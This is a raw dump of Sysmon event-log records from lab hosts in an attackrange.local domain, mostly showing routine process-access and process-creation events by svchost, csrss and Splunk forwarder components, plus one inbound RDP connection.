09:02:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976780Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976779Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976778Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976777Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976776Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.983{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-88A3-6151-8479-00000000FD01}512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976775Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.983{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88A3-6151-8479-00000000FD01}512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976774Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.969{69CF5F33-88A3-6151-8479-00000000FD01}512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048171Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:27.119{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09B562E45CD7638FF13B1A43BA69D0D0,SHA256=9448D52EB43D9A78A6E33966C73D7B8B35CFCD1CA9E61B7256BAC5582C1C98CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976773Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.296{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88A3-6151-8379-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976772Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.296{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976771Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.296{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976770Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.296{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976769Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.296{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976768Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.296{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976767Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.296{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976766Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.296{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976765Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.296{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976764Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976763Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.280{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-88A3-6151-8379-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976762Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.280{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88A3-6151-8379-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976761Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:27.281{69CF5F33-88A3-6151-8379-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000976803Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.689{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-53230-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000976802Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.499{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88A4-6151-8579-00000000FD01}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976801Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.499{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976800Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.499{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976799Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.499{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976798Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 